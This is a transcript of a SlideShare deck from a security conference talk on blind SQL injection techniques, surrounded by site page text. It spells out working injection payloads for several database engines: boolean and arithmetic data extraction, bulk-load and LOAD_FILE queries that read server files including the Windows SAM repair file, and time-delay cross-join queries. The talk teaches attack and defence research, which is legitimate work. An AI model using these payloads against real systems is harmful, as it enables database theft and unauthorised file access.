Your SlideShare is downloading. ×
downloaded from here
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×

Introducing the official SlideShare app

Stunning, full-screen experience for iPhone and Android

Text the download link to your phone

Standard text messaging rates apply

downloaded from here

520
views

Published on


0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
520
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
13
Comments
0
Likes
1
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. (Re) Playing with (Blind) SQL Injection José Palazón “Palako” Mobile Security at Yahoo! Chema Alonso Informatica64 Microsoft MVP Enterprise Security
  • 2. Spain (…not only bulls…)
  • 3. SQL Injection attacks http://www.phrack.org/issues.html?id=8&issue=54 A long time ago, in a galaxy far, far away…
  • 4. Agenda
    • Serialized SQL Injection
      • Demo: XML Extractor
    • Arithmetic SQL Injection
      • Divide by Zero
      • Sums and subtractions
      • Type oveflow
      • Demo
    • Remote File Downloading using Blind SQL Injection
      • SQL Sever
      • MySQL
      • Oracle
      • Demo: RFD Tool
    • Time-Based Blind SQL Injection using heavy queries
      • Demo: Marathon Tool
  • 5. Serialized SQL Injection
  • 6. Serialized SQL Injection
    • Goal: To Merge complex resultsets in a single showable field
    • XML serialization functions allow to convert a resultset into a one XML string.
    • It´s possible to download big amount of data with single and simple injections.
  • 7. SQL Server
    • FOR XML: Retrieves data as a single string representing an XML tree.
    • RAW: Mandatory option. Shows the information converting each row of the result set in an XML element in the form <row />.
    • BINARY BASE64: The query will fail if we find any BINARY data type column (containing images, or passwords) if this option is not explicitly specified.
      • union select '1','2','3',(select * from sysusers for xml raw, binary base64)
    • XMLSCHEMA: obtains the whole table structure, including the data types, column names and other constraints.
      • Described by Dani Kachakil
  • 8. MySQL
    • No default XML support, requires a server side extension
    • GROUP_CONCAT (v 4.1+)
  • 9. Oracle
    • xmlforest, xmlelement,…
    • No * support
  • 10. Demo: Serialized SQL Injection
  • 11. Arithmetic Blind SQL Injection
  • 12. Blind Attacks
    • Attacker injects code but can´t access directly to the data.
    • However this injection changes the behavior of the web application.
    • Then the attacker looks for differences between true code injections (1=1) and false code injections (1=2) in the response pages to extract data.
      • Blind SQL Injection
      • Biind Xpath Injection
      • Blind LDAP Injection
  • 13. Blind SQL Injection Attacks
    • Attacker injects:
      • “ True where clauses”
      • “ False where clauses“
      • Ex:
        • Program.php?id=1 and 1=1
        • Program.php?id=1 and 1=2
    • Program doesn’t return any visible data from database or data in error messages.
    • The attacker can´t see any data extracted from the database.
  • 14. Blind SQL Injection Attacks
    • Attacker analyzes the response pages looking for differences between “True-Answer Page” and “False-Answer Page”:
      • Different hashes
      • Different html structure
      • Different patterns (keywords)
      • Different linear ASCII sums
      • “ Different behavior”
        • By example: Response Time
  • 15. Blind SQL Injection Attacks
    • If any difference exists, then:
      • Attacker can extract all information from database
      • How? Using “booleanization”
        • MySQL:
          • Program.php?id=1 and 100>(ASCII(Substring(user(),1,1)))
            • “ True-Answer Page” or “False-Answer Page”?
        • MSSQL:
          • Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1))) from sysusers)
        • Oracle:
          • Program.php?id=1 and 100>(Select ASCII(Substr(username,1,1))) from all_users where rownum<=1)
  • 16. Arithmetic Blind SQL Injection
    • The query force the parameter to be numeric
      • SELECT field FROM table WHERE id=abs( param )
    • Boolean logic is created with math operations
      • Divide by zero
      • Sums and subtractions
      • Type overflows
  • 17. Arithmetic Blind SQL Injection
    • Divide by zero (David Litchfield)
      • Id=A+(1/(ASCII(B)-C))
        • A-> Param value originally used in the query.
        • B -> Value we are searching for, e.g.: Substring(passwd,1,1)
        • C-> Counter [0..255]
      • When ASCII(B)=C, the DB will generate a divide by zero exception.
  • 18. Arithmetic Blind SQL Injection
    • Sums and subtractions
      • Id=A+ASCII(B)-C
        • A-> Param value originally used in the query.
        • B -> Value we are searching for, e.g.: Substring(passwd,1,1)
        • C-> Counter [0..255]
      • When ASCII(B)=C, then the response page of id=A+ASCII(B)-C will be the same as id=A
  • 19. Arithmetic Blind SQL Injection
    • Value type overflow
      • Id=A+((C/ASCII(B))*(K))
        • A-> Param value originally used in the query.
        • B -> Value we are searching for, e.g.: Substring(passwd,1,1)
        • C-> Counter [0..255]
        • K-> Value that overflows the type defined for A
          • (e.g. if A is integer, then K=2^ 32 )
      • When C/ASCII(B)==1, K*1 overflows the data type
  • 20. Demo:
    • Divide by zero
    • Sums and subtractions
    • Integer overflow
  • 21. Remote File Downloading using Blind SQL Injection techniques
  • 22. Accessing Files
    • Two ways:
      • Load the file in a temp table
        • and i>(select top 1 ASCII(Substring(column)(file,pos,1)) from temp_table ??
      • Load the file in the query
        • With every query the file is loaded in memory
        • I am very sorry, engine 
        • and i>ASCII(Substring(load_file(file,pos,1))??
  • 23. SQL Server 2K - External Data Sources
    • Only for known filetypes:
      • Access trough Drivers: Txt, csv, xls, mdb, log
      • And 200>ASCII (SUBSTRING(SELECT * FROM OPENROWSET('MSDASQL', 'Driver = {Microsoft Text Driver (*.txt; *.csv)};DefaultDir=C:;','select top 1 * from c:dir arget.txt’),1,1))
    • Privileges
      • HKEY_LOCAL_MACHINESOFTWAREMicrosoftMSSQLServerProviders DisallowAdhocAccess=0
      • By default this key doesn´t exist so only users with Server Admin Role can use these functions.
    • NTFS permissions
  • 24. SQL Server 2K – Bulk option
    • Access to any file
      • ; Create Table TempTable as (row varchar(8000)) --
      • ; Bulk Insert TempTable From 'c:file.ext' With (FIELDTERMINATOR = ' ', ROWTERMINATOR = ' ‘) --
      • ; alter table TempTable add num int IDENTITY(1,1) NOT NULL –
      • and (select COUNT(row) from TempTable)
      • and (select top 1 len(row) from TempTable where num = rownum)
      • and (select top 1 ASCII(SUBSTRING(row,1,1)) from TempTable where num = 1)
      • ; Drop Table TempTable--
    • Privileges needed
      • Server Role: Bulkadmin
      • Database Role: db_owner o db_ddladmin
    • NTFS permissions
  • 25. SQL Server 2k5 – 2k8
    • OPENDATASOURCE and OPENROWSET supported
    • Bulk options improved
      • AND 256 > ASCII(SUBSTRING ((SELECT * FROM OPENROWSET(BULK 'c:windows epairsam', SINGLE_BLOB) As Data), 1, 1))—
    • Permisions
        • Bulkadmin Server Role
        • External Data Sources enabled
        • Sp_configure
        • Surface configuration Tool for features
  • 26. MySQL
    • LoadFile
      • SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
        • SQLbfTools: MySQLget command (illo and dab)
        • http://www.reversing.org/node/view/11
    • Load Data infile
      • ; Create table C8DFC643 (datos varchar(4000))
      • ; Load data infile 'c:oot.ini' into table C8DFC643
      • ; alter table C8DFC643 add column num integer auto_increment unique key
      • and (select count(num) from C8DFC643)
      • and (select length(datos) from C8DFC643 where num = 1)
      • and (select ASCII(substring(datos,5,1)) from C8DFC643 where num = 1)
      • ; Drop table C8DFC643
  • 27. Oracle – Plain Text files
    • External Tables
      • ; execute immediate 'Create Directory A4A9308C As ''c:'' '; end; --
      • ; execute immediate 'Create table A737D141 ( datos varchar2(4000) ) organization external (TYPE ORACLE_LOADER default directory A4A9308C access parameters ( records delimited by newline ) location (''boot.ini''))'; end;--
      • Only Plain Text files
  • 28. Oracle – DBMS_LOB
    • ; execute immediate ‘
    • DECLARE l_bfile BFILE;
    • l_blob BLOB;
    • BEGIN INSERT INTO A737D141 (datos) VALUES (EMPTY_BLOB()) RETURN datos INTO l_blob;
    • l_bfile := BFILENAME(''A4A9308C'', ''Picture.bmp'');
    • DBMS_LOB.fileopen(l_bfile, Dbms_Lob.File_Readonly);
    • DBMS_LOB.loadfromfile(l_blob,l_bfile,DBMS_LOB.getlength(l_bfile));
    • DBMS_LOB.fileclose(l_bfile);
    • COMMIT;
    • EXCEPTION
    • WHEN OTHERS THEN ROLLBACK;
    • END;‘
    • ; end; --
  • 29. Demo RFD
  • 30. Time-based Blind SQL Injection using heavy queries
  • 31. Time-Based Blind SQL Injection
    • In scenarios with no differences between “True-Answer Page” and “False-Answer Page”, time delays can be used.
    • Injection forces a delay in the response page when the condition injected is True.
      • - Delay functions:
        • SQL Server: waitfor
        • Oracle: dbms_lock.sleep
        • MySQL: sleep or Benchmark Function
        • Postgres: pg_sleep
      • Ex:
        • ; if (exists(select * from users)) waitfor delay '0:0:5’
  • 32. Exploit for Solar Empire Web Game
  • 33. Deep Blind SQL Injection
    • Time delay depends on the wanted value.
    • E.g. “a”->10s. delay, “b”->11s. Delay, …
    • http://labs.portcullis.co.uk/application/deep-blind-sql-injection/
  • 34. Time-Based Blind SQL Injection
    • What about databases engines without delay functions, i.e., MS Access, Oracle connection without PL/SQL support, DB2, etc…?
    • Can we still perform an exploitation of Time-Based Blind SQL Injection Attacks?
  • 35. Yes, we can!
  • 36. “ Where-Clause” execution order
    • Select “whatever “
    • From whatever
    • Where condition1 and condition2
    • - Condition1 lasts 10 seconds
    • - Condition2 lasts 100 seconds
    • Which condition should be executed first?
  • 37. The heavy condition first Condition2 (100 sec) Condition1 (10 sec) Condition2 & condition1 Response Time TRUE FALSE FALSE 110 sec TRUE TRUE TRUE 110 sec FALSE Not evaluated FALSE 100 sec
  • 38. The light condition first Condition1 (10 sec) Condition2 (100 sec) Condition1 & condition2 Response Time TRUE FALSE FALSE 110 sec TRUE TRUE TRUE 110 sec FALSE Not evaluated FALSE 10 sec
  • 39. Time-Based Blind SQL Injection using Heavy Queries
    • Attacker can perform an exploitation delaying the “True-answer page” using a heavy query.
    • It depends on how the database engine evaluates the where clauses in the query.
    • There are two types of database engines:
      • Databases without optimization process
      • Databases with optimization process
  • 40. Time-Based Blind SQL Injection using Heavy Queries
    • Attacker could inject a heavy Cross-Join condition for delaying the response page in True-Injections.
    • The Cross-join injection must be heavier than the other condition.
    • Attacker only have to know or to guess the name of a table with select permission in the database.
    • Example in MSSQL:
      • Program.php?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)
  • 41. “ Default” tables to construct a heavy query
      • Microsoft SQL Server
        • sysusers
      • Oracle
        • all_users
      • MySQL (versión 5)
        • information_schema.columns
      • Microsoft Access
        • MSysAccessObjects (97 & 2000 versions)
        • MSysAccessStorage (2003 & 2007)
  • 42. “ Default” tables to construct a heavy query
    • … or whatever you can guess
      • Clients
      • Customers
      • News
      • Logins
      • Users
      • Providers
      • … .Use your imagination…
  • 43. Ex 1: MS SQL Server
    • Query lasts 14 seconds -> True-Answer
  • 44. Ex 1: MS SQL Server
    • Query lasts 1 second -> False-Answer
  • 45. Ex 2: Oracle
    • Query Lasts 22 seconds –> True-Answer
  • 46. Ex 2: Oracle
    • Query Lasts 1 second –> False-Answer
  • 47. Ex 3: Access 2000
    • Query Lasts 6 seconds –> True-Answer
  • 48. Ex 3: Access 2000
    • Query Lasts 1 second –> False-Answer
  • 49. Ex 4: Access 2007
    • Query Lasts 39 seconds –> True-Answer
  • 50. Ex 4: Access 2007
    • Query Lasts 1 second –> False-Answer
  • 51. Marathon Tool
    • Automates Time-Based Blind SQL Injection Attacks using Heavy Queries in SQL Server, MySQL, MS Access and Oracle Databases.
    • Schema Extraction from known databases
    • Extract data using heavy queries not matter in which database engine (without schema)
    • Developed in .NET
    • Source code available
  • 52. Demo: Marathon Tool
  • 53. Prevention: Don´t forget Bobby Tables! SANITIZE YOUR QUERIES!
  • 54. ¿Preguntas?
    • Speakers:
      • Chema Alonso ( [email_address] )
      • Palako ( [email_address] )
    • Autores
      • Chema Alonso ( [email_address] )
      • Alejandro Martín ( [email_address] )
      • Antonio Guzmán ( [email_address] )
      • Daniel Kachakil ( [email_address] )
      • José Palazón “Palako” ( [email_address] )
      • Marta Beltran ( [email_address] )